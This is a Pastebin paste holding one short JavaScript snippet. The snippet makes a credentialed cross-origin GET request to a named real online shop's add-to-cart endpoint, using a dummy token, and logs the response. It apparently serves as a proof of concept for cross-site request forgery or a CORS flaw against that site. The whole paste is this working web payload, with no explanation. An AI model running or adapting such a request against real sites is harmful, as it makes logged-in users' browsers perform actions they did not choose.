Advertisement
NikolayBezay

Untitled

Dec 22nd, 2021
164
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.47 KB | None | 0 0
  1.  
  2. (function() {
  3. var URL = 'https://www.ilmakiage.co.il/ajax/index/addtocart?id=66015&qty=1&token=dsdsdsdsdsdsdsd';
  4. var data = null;
  5. var xhr = new XMLHttpRequest();
  6. xhr.withCredentials = true;
  7. xhr.addEventListener('readystatechange', function () {
  8. if (this.readyState === 4) {
  9. console.log(this.response);
  10. }
  11. });
  12. xhr.open('GET', URL);
  13. xhr.setRequestHeader('cache-control', 'no-cache');
  14. xhr.send(data);
  15. })();
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement